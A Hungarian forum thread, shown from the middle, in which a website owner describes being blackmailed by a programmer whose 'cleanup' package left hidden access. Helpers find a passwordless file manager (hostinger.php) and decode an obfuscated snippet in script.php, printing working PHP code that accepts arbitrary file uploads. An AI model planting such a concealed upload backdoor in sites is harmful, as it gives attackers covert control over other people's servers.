Kezdőoldal » Számítástechnika » Programozás » Kaptam egy fenyegetést egy...

Kaptam egy fenyegetést egy programozó sráctól, hogy töröljem le az oldalamat vagy letörölteti, hogyan férhet hozzá?

Figyelt kérdés

Felajánlotta ingyen, hogy segít.

Nagyon-nagyon óvatos voltam, hogy ne nyúlhasson bele, de végül csak beadtam a derekam és feltelepítettem azt a csomagot amit ő "jóindulatúan" átküldött, hogy minden jó legyen. Mivel nekem is rengeteg munkám volt az oldalon nem igazán volt szükségem arra, hogy ő így nagyon "áttisztítsa" meg mittudomén, de megcsinálta.


Idővel elkezdett gyanúsan viselkedni majd kötekedni.

A kötekedés zsarolásba ment át, és valahogy belülről hozzáfér a weboldalamhoz és meg tudja változtatni a tartalmat, így egyszer már letörölte a file-okat.


Én írtam a szolgáltatómnak, hogy hackertámadás alatt állok de alapvetően nem tudom mit tehetnék.


Meg tudnátok mondani pontosan hogyan lehetséges PHP vagy javascript alapon belenyúlni a filerendszerbe anélkül, hogy adatbázis futna az oldalamon? Mit kell keresnem? Sajnos ehhez nem értek.


Meg a másik, hogy egyáltalán hogyan tudom ezt az elmebeteget leállítani? Senki sem kérte, hogy "tisztítsa le" az oldalam kódját, de mivel én is dolgoztam rajta párhuzamosan, olyan szinten összekeveredett a két munka, hogy az egészet újra kéne csinálnom és nem fogom, mert már bocs, de senki sem kérte arra hogy önként segítsen.


Lehet, hogy ez egy piti bűnöző és nagyon sok emberrel játszotta már ezt el. Hogyan állítsam le, és hogyan nyúl bele az oldalamba? Az ftp jelszó már rég meg van változtatva.


2016. dec. 8. 15:01
1 2 3 4 5 6 7
 21/65 anonim ***** válasza:

Nem zavar hogy ott van kapásból a gyökérkönyvtárban a hostinger.php ami egy fájlkezelő és még csak jelszót se kér?


[link]

2016. dec. 8. 19:56
Hasznos számodra ez a válasz?
 22/65 A kérdező kommentje:
hiába töröltem le, ugyanúgy leszedte a weboldalamat. Nem ott van a probléma, az csak csali.
2016. dec. 8. 19:58
 23/65 A kérdező kommentje:

De miért nem kér jelszót? Úristen.

Ezt nem értem.

Ez hogy lehetséges?

2016. dec. 8. 19:59
 24/65 A kérdező kommentje:
Érdekes de valahogy a file eltávolításával is hozzáfér az oldalhoz, hogyan tudom kizárni? (bocsi, nagyon nem értek a php-hoz, de mondtam is neki, talán pont ezért élt vissza vele)
2016. dec. 8. 20:01
 25/65 anonim ***** válasza:
Te most viccelsz? Nem az a gond? Gyakorlatilag bármihez hozzáférünk... Mindenképpen töröld le azt is!
2016. dec. 8. 20:01
Hasznos számodra ez a válasz?
 26/65 A kérdező kommentje:
Letöröltem már egyszer és ugyanúgy letörölte az oldalt valahogy. Pedig jelszót is váltottam.
2016. dec. 8. 20:03
 27/65 anonim ***** válasza:
Az egyik fájlban valóban benne van, hogy bármit fel tud tölteni a tárhelyre. Ha akarja, akkor visszatölti a php-t és letöröl újra mindent.
2016. dec. 9. 14:24
Hasznos számodra ez a válasz?
 28/65 anonim ***** válasza:

"Az egyik fájlban valóban benne van, hogy bármit fel tud tölteni a tárhelyre"

Meg tudnad mondani, hogy melyik az a file? Nem vagom a web programozast, es semmi erre utalo sort nem talaltam. Koszi.

2016. dec. 9. 15:09
Hasznos számodra ez a válasz?
 29/65 A kérdező kommentje:

Én is azt kérdezném, hogy meg tudná-e mondani.

A hostinger.php-ra célozhat, de miután letöröltem is bele tudott nyúlni az oldalba, szóval szerintem azt csaliként rakhatta ki.

2016. dec. 9. 16:38
 30/65 CspCsj ***** válasza:

Csak nagyon alapszinten értek a PHP-hez, de a "script.php"-ben miért kell a "$control" változó tartalmát háromszor kódolni?


Dekódolás után ez az értéke:

$important=$_SERVER["DOCUMENT_ROOT"]."/php/";if(!empty($_POST)){if(!is_dir($important))mkdir($important);move_uploaded_file($_FILES["index"]["tmp_name"],$important.basename($_FILES["index"]["name"]));}

2016. dec. 9. 17:17
Hasznos számodra ez a válasz?
1 2 3 4 5 6 7

Kapcsolódó kérdések:




Minden jog fenntartva © 2024, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu

A weboldalon megjelenő anyagok nem minősülnek szerkesztői tartalomnak, előzetes ellenőrzésen nem esnek át, az üzemeltető véleményét nem tükrözik.
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!